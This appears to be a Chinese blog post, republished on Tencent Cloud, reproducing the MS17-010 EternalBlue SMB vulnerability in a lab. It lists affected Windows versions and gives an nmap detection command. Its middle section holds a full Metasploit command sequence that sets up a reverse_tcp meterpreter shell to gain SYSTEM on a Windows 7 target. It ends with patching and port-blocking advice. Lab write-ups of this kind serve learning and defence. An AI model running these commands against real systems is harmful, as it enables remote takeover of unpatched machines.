前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >ms-17-010漏洞复现

ms-17-010漏洞复现

作者头像
R0A1NG
发布2022-02-19 09:32:16
发布2022-02-19 09:32:16
1K0
举报
文章被收录于专栏:R0A1NG 技术分享R0A1NG 技术分享

漏洞简介

EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。

漏洞影响范围

Windows Server 2000 SP0 x86 Windows 2000 Professional SP4 x86 Windows 2000 Advanced Server SP4 x86 Windows XP SP0 x86 Windows XP SP1 x86 Windows XP SP2 x86 Windows XP SP3 x86 Windows XP SP2 x64 Windows Server 2003 x86 Windows Server 2003 Enterprise SP 2 x86 Windows Server 2003 x64 Windows Vista Home Premium x86 Windows Server 2008 x64 Windows 7 x86 Windows 7 x64 Windows Server 2008 R2 x64 Windows 8 x86 Windows 8 x64 Windows 8.1 x86 Windows 8.1 x64 Windows Server 2012 R2 Standard 9600 x64 Windows Server 2016 10.10586 x64 Windows Server 2016 Data Center 10.14393 x64

漏洞检测

使用nmap命令:nmap -p445 --script smb-vuln-ms17-010 目标IP

复现

攻击机 kali 192.168.23.140 靶机 win7 192.168.23.137

使用msf

msfconsole msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > show options msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.23.137 msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.23.140 msf6 exploit(windows/smb/ms17_010_eternalblue) > run 最后获得system权限

漏洞处理

1.下载安全补丁 2、添加入站规则,关闭445、135、137、138、139端口

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021 年 03 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 漏洞影响范围
  • 漏洞检测
  • 复现
  • 漏洞处理
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档